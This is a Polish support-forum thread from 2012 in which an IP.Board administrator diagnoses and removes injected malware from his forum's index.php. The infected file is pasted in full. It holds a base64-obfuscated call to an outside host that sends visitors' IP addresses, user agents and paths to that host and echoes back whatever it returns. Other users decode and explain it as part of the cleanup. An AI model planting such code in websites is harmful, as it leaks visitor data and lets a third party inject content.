ROZWIĄZANY: Malware na forum.

[subek]

Hej,

Userzy zgłosili mi jakiegoś trojana na forum http://www.nissantech.pl/?showtopic=9011 wgrałem ostatnie łatki i ponaprawiałem poprzez PA bazę bo jeden wpis był uszkodzony. Niestety nic to nie pomogło. Miał ktoś może podobny problem?

[Georgeon]

A dokładniej? Opisz co się dzieje, na forum coś się zmieniło?

[subek]

No ja konkretnie nie widzę żadnych zmian, natomiast userzy (w temacie do którego podałem linka, możesz rzucić okiem) piszą, że jakieś cyrki się dzieją.

Edit, wszedłem z IE i takie coś wywala

Warning: Cannot modify header information - headers already sent by (output started at /index.php:22) in /admin/sources/classes/output/formats/html/htmlOutput.php on line 114

Warning: Cannot modify header information - headers already sent by (output started at /index.php:22) in /admin/sources/classes/output/formats/html/htmlOutput.php on line 127

Warning: Cannot modify header information - headers already sent by (output started at /index.php:22) in /admin/sources/classes/output/formats/html/htmlOutput.php on line 136

Warning: Cannot modify header information - headers already sent by (output started at /index.php:22) in /admin/sources/classes/output/formats/html/htmlOutput.php on line 137

Warning: Cannot modify header information - headers already sent by (output started at /index.php:22) in /admin/sources/classes/output/formats/html/htmlOutput.php on line 141

Edytowane 11 Marca 2012 przez subek

[Budyn]

Pokaż co masz w index.php w granicach lini 22 (nie ze źródła a z FTP )

[subek]

<?php if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
   // This code use for global bot statistic
   $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
   $stCurlHandle = NULL;
   $stCurlLink = "";
   if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
   {
       if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
       $stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
           $stCurlHandle = curl_init( $stCurlLink ); 
   }
   } 
if ( $stCurlHandle !== NULL )
{
   curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
   $sResult = @curl_exec($stCurlHandle); 
   if ($sResult[0]=="O") 
    {$sResult[0]=" ";
     echo $sResult; // Statistic code end
     }
   curl_close($stCurlHandle); 
}
} 
/**
* <pre>
* Invision Power Services
* IP.Board v3.2.3
* Main public executable wrapper.
* Set-up and load module to run
* Last Updated: $Date: 2011-03-11 12:41:48 -0500 (Fri, 11 Mar 2011) $
* </pre>
*
* @author  $Author: ips_terabyte $
* @copyright (c) 2001 - 2009 Invision Power Services, Inc.
* @license http://www.invisionpower.com/community/board/license.html
* @package IP.Board
* @link http://www.invisionpower.com
* @version $Rev: 8042 $
*
*/ 

define( 'IPB_THIS_SCRIPT', 'public' );
require_once( './initdata.php' );/*noLibHook*/

require_once( IPS_ROOT_PATH . 'sources/base/ipsRegistry.php' );/*noLibHook*/
require_once( IPS_ROOT_PATH . 'sources/base/ipsController.php' );/*noLibHook*/

ipsController::run();

exit();

[Georgeon]

Usuń program za pomocą którego łączysz się na ftp, przeskanuj komputer antywirusem, zmien hasło do ftp i podmien pliki index.php, albo najlepiej wszystkie pliki z ftp usuń i wyślij backup.

Edytowane 11 Marca 2012 przez Georgeon

[Budyn]

Sprawdź na FTP datę i godzinę modyfikacji index.php

i sprawdź jak się będzie forum zachowywało na czystym index.php

Długi masz ten index u mnie wygląda tak :

<?php
/**
* <pre>
* Invision Power Services
* IP.Board v3.2.3
* Main public executable wrapper.
* Set-up and load module to run
* Last Updated: $Date: 2011-03-11 12:41:48 -0500 (Fri, 11 Mar 2011) $
* </pre>
*
* @author         $Author: ips_terabyte $
* @copyright    (c) 2001 - 2009 Invision Power Services, Inc.
* @license        http://www.invisionpower.com/community/board/license.html
* @package        IP.Board
* @link        http://www.invisionpower.com
* @version        $Rev: 8042 $
*
*/    

define( 'IPB_THIS_SCRIPT', 'public' );
require_once( './initdata.php' );/*noLibHook*/

require_once( IPS_ROOT_PATH . 'sources/base/ipsRegistry.php' );/*noLibHook*/
require_once( IPS_ROOT_PATH . 'sources/base/ipsController.php' );/*noLibHook*/

ipsController::run();

exit();

[subek]

Usuń program za pomocą którego łączysz się na ftp, przeskanuj komputer antywirusem, zmien hasło do ftp i podmien pliki index.php, albo najlepiej wszystkie pliki z ftp usuń i wyślij backup.

Ode mnie to raczej nie wyszło, nie wchodziłem na ftp od dawna, a jak wchodzę to spod linuxa. Pierwsze co zrobiłem to zablokowałem dostęp do ftp innym adminom.

Zacznę podmieniać pliki i zobaczę co się będzie działo.

[Georgeon]

Ode mnie to raczej nie wyszło, nie wchodziłem na ftp od dawna.

Nie koniecznie, nie wiem jak łączysz się z ftp, ale niektóre programy mają zapisaną historię ostatnich połączeń z serwerem.

[subek]

Z tym, że do mojego konta zmieniam co jakiś czas hasło nawet kiedy się nie łączę w międzyczasie, tego by chyba ten robal nie obszedł?

[Budyn]

Wgrałem do siebie Twój index.php i miałem to samo co Ty.

Zwróc uwagę na tą linijke :

       $stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);

Po zmianie fragmentu 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw' na xxx "błędy" znikają.

Więc teraz pytanie , co jest zakodowane w tym ?

https://www.google.com/search?q=aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:pl:official&client=firefox-a

[subek]

Wgrałem czysty index i na razie jest ok

[Jakub]

Zakodowany jest ten adres:

http://adveconfirm.com/stat/stat.php

[Georgeon]

Sprawdź wszystkie index.php i index.html na serwerze, również w podfolderach, np. kiedy były ostatnio modyfikowane.

Zakodowany jest ten adres:

http://adveconfirm.com/stat/stat.php

A co to za adres?

Edytowane 11 Marca 2012 przez Georgeon

[Amfidiusz]

To jakiś zmasowany atak

http://forum.invisionize.pl/topic/30644-cannot-modify-header-information/

[subek]

Podmieniło wszystkie...

[DawPi]

Problem ROZWIĄZANY. Jeśli są jakiekolwiek wątpliwości, pytania proszę o założenie nowego tematu.

Wszelkie uzasadnione reklamacje/pretensje/sugestie/rady przyjmuje ekipa forum.